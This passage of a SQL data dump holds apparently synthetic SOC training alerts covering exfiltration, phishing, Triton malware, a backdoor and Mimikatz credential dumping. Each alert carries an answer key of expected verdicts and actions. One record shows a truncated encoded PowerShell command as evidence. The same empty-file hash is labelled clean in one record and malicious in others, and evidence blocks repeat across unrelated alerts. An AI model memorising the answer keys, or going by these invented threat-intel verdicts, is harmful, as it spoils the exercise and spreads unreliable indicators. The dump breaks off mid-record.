(824, 'Exfiltration of Sensitive Data', 'critical', 'Data Loss Prevention Systems', 'After establishing a foothold in the target networks, APT41 began exfiltrating sensitive data, highlighting the operation\'s true espionage objective amid the larger attack. The exfiltration was detected through anomalous data transfer patterns from internal servers to an external IP address.', 'Data Breach', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:27:32Z\",\"source_ip\":\"10.12.45.67\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filename\":\"financial_report_q3_2023.xlsx\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_id\":\"EXFIL1234\",\"description\":\"Detected unauthorized data transfer to external IP\",\"protocol\":\"HTTPS\",\"bytes_transferred\":10485760}', '2026-01-12 22:25:20', '2026-02-16 17:58:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT41.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.12.45.67\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Legitimate user credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File System Logs\",\"verdict\":\"clean\",\"details\":\"Sensitive file containing proprietary financial 
data.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious signatures associated with this hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.477Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:32Z\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_id\\\":\\\"EXFIL1234\\\",\\\"description\\\":\\\"Detected unauthorized data transfer to external IP\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760}\"},{\"timestamp\":\"2026-02-01T20:31:22.477Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:32Z\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_id\\\":\\\"EXFIL1234\\\",\\\"description\\\":\\\"Detected unauthorized data transfer to external 
IP\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760}\"},{\"timestamp\":\"2026-02-01T20:30:22.477Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:32Z\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_id\\\":\\\"EXFIL1234\\\",\\\"description\\\":\\\"Detected unauthorized data transfer to external IP\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760}\"},{\"timestamp\":\"2026-02-01T20:29:22.477Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:32Z\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_id\\\":\\\"EXFIL1234\\\",\\\"description\\\":\\\"Detected unauthorized data transfer to external IP\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760}\"},{\"timestamp\":\"2026-02-01T20:28:22.477Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:32Z\\\",\\\"source_ip\\\":\\\"10.12.45.67\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_id\\\":\\\"EXFIL1234\\\",\\\"description\\\":\\\"Detected unauthorized data transfer to external 
IP\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_transferred\\\":10485760}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(825, 'Initial Access via Phishing Email', 'high', 'Email Gateway Logs', 'The attackers initiated their operation by sending a spear-phishing email to the employee, attempting to steal credentials and gain a foothold in the network. The email contained a malicious attachment intended to execute a payload if opened.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-08T14:22:34Z\",\"email_subject\":\"Urgent: Update Your Account Information\",\"sender_email\":\"john.doe@maliciousdomain.com\",\"recipient_email\":\"jane.smith@company.com\",\"attachment_name\":\"Invoice_Update.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"sender_ip\":\"203.0.113.45\",\"recipient_ip\":\"192.168.1.10\",\"headers\":{\"User-Agent\":\"Mozilla/5.0\",\"X-Mailer\":\"PHPMailer 6.1\"}}', '2026-01-13 01:52:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Domain associated with previous phishing attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"IP address flagged for distributing phishing emails.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with known malicious PDF files.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-01T20:32:22.478Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(826, 'Execution of Malware Payload', 'high', 'Endpoint Detection and Response (EDR)', 'Attackers executed the Triton/TRISIS payload on a compromised host within the plant network. This action aims to manipulate safety systems stealthily.', 'Malware Deployment', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"event_id\":\"EDR-20231015-00123\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"10.20.30.40\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"process_name\":\"triton_deploy.exe\",\"file_hash\":\"9f2d3c2b4a7d8e9f1a3b5c7d8e9f0b3c\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\triton_deploy.exe\",\"action\":\"Execution\",\"result\":\"Success\"}', '2026-01-13 01:52:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Triton/TRISIS activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9f2d3c2b4a7d8e9f1a3b5c7d8e9f0b3c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with Triton/TRISIS.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"triton_deploy.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable file linked to Triton/TRISIS deployment.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(827, 'Establishing Persistence', 'medium', 'Network Traffic Analysis', 'An unusual outbound connection was detected from an internal host to a known malicious IP address. Further analysis revealed the installation of a backdoor that allows persistent access to the compromised system.', 'Backdoor Installation', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"src_ip\":\"192.168.10.15\",\"dst_ip\":\"203.0.113.56\",\"protocol\":\"TCP\",\"dst_port\":4444,\"filename\":\"persistence_backdoor.exe\",\"hash\":\"a1b2c3d4e5f67890123456789abcdef0\",\"user\":\"jdoe\",\"event\":\"Outbound connection detected\",\"threat_level\":\"medium\",\"description\":\"Outbound traffic from internal host to a known malicious IP associated with backdoor activity.\"}', '2026-01-13 01:52:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple backdoor campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"persistence_backdoor.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAnalysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual executable name for user jdoe.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(828, 'Lateral Movement to SIS Controllers', 'high', 'Internal Network Logs', 'The attackers, having established persistence on the network, are attempting lateral movement targeting Triconex SIS controllers. This step involves the use of known malicious IPs and tools to gain access to critical safety systems.', 'Network Propagation', 'T1021 - Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:30Z\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"10.0.0.50\",\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"triconex_exploit.exe\",\"username\":\"admin_sis\",\"event\":\"connection_attempt\",\"status\":\"allowed\",\"description\":\"Connection attempt from internal workstation to SIS controller using known malware tool.\"}', '2026-01-13 01:52:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"internal\",\"details\":\"IP of targeted SIS controller.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Triconex-targeting 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"triconex_exploit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"malicious\",\"details\":\"Malware file used in the attack.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"admin_sis\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"internal\",\"details\":\"Username used in the lateral movement attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(829, 'Exfiltration of System Configurations', 'high', 'Data Loss Prevention Systems', 'As the final step in their operation, attackers have successfully exfiltrated sensitive system configurations. This data is likely being analyzed to refine future attacks, posing a significant threat to the integrity of our systems.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"event_id\":\"dlp-202310151435\",\"source_ip\":\"192.168.20.45\",\"destination_ip\":\"203.0.113.5\",\"user\":\"jdoe\",\"filename\":\"system_configs.zip\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"status\":\"successful\",\"details\":\"File system_configs.zip containing sensitive configurations was exfiltrated to remote IP 203.0.113.5 over HTTPS.\"}', '2026-01-13 01:52:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.20.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"public_reputation\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"system_configs.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive configurations.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_reputation\",\"verdict\":\"malicious\",\"details\":\"Hash of exfiltrated file linked to malicious 
activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_accounts\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.487Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"dlp-202310151435\\\",\\\"source_ip\\\":\\\"192.168.20.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"system_configs.zip\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"successful\\\",\\\"details\\\":\\\"File system_configs.zip containing sensitive configurations was exfiltrated to remote IP 203.0.113.5 over HTTPS.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.487Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"dlp-202310151435\\\",\\\"source_ip\\\":\\\"192.168.20.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"system_configs.zip\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"successful\\\",\\\"details\\\":\\\"File system_configs.zip containing sensitive configurations was exfiltrated to remote IP 203.0.113.5 
over HTTPS.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.487Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"dlp-202310151435\\\",\\\"source_ip\\\":\\\"192.168.20.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"system_configs.zip\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"successful\\\",\\\"details\\\":\\\"File system_configs.zip containing sensitive configurations was exfiltrated to remote IP 203.0.113.5 over HTTPS.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.487Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"dlp-202310151435\\\",\\\"source_ip\\\":\\\"192.168.20.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"system_configs.zip\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"successful\\\",\\\"details\\\":\\\"File system_configs.zip containing sensitive configurations was exfiltrated to remote IP 203.0.113.5 over HTTPS.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.487Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"dlp-202310151435\\\",\\\"source_ip\\\":\\\"192.168.20.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"system_configs.zip\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"status\\\":\\\"successful\\\",\\\"details\\\":\\\"File system_configs.zip containing sensitive configurations was exfiltrated to remote IP 203.0.113.5 over HTTPS.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(830, 'Initial Access via Phishing', 'high', 'Email gateway logs', 'The attackers initiated their campaign by sending targeted phishing emails to HSE employees, embedding malicious attachments designed to exploit vulnerabilities and install ransomware.', 'Spear-phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T10:45:30Z\",\"email_id\":\"abc123xyz\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"sender_email\":\"attacker@malicious.com\",\"recipient_email\":\"employee@hse.gov\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"Invoice_2023.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\"}', '2026-01-13 01:56:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known phishing IP address associated with multiple campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Reported as phishing email sender.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing\",\"date\":\"2026-02-01T20:32:22.489Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(831, 'Lateral Movement Detected', 'high', 'Network traffic analysis', 'Network traffic analysis detected suspicious lateral movement activity. The attackers used credential dumping techniques to gain access to additional systems within the HSE network, targeting critical systems managing the COVID-19 vaccination program.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.12\",\"event_type\":\"credential_access\",\"tool_used\":\"Mimikatz\",\"dump_file\":\"lsass.dmp\",\"username\":\"admin_user\",\"hash\":\"3b8e7f212f4f9b5a1c6c7a95b7e6d3e6\",\"alert_id\":\"alert_12345\",\"description\":\"Credential dumping attempt detected from external IP targeting HSE internal network.\"}', '2026-01-13 01:56:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Critical server within HSE network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b8e7f212f4f9b5a1c6c7a95b7e6d3e6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz credential dumping tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Security Logs\",\"verdict\":\"suspicious\",\"details\":\"File often used in credential dumping attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"User account with 
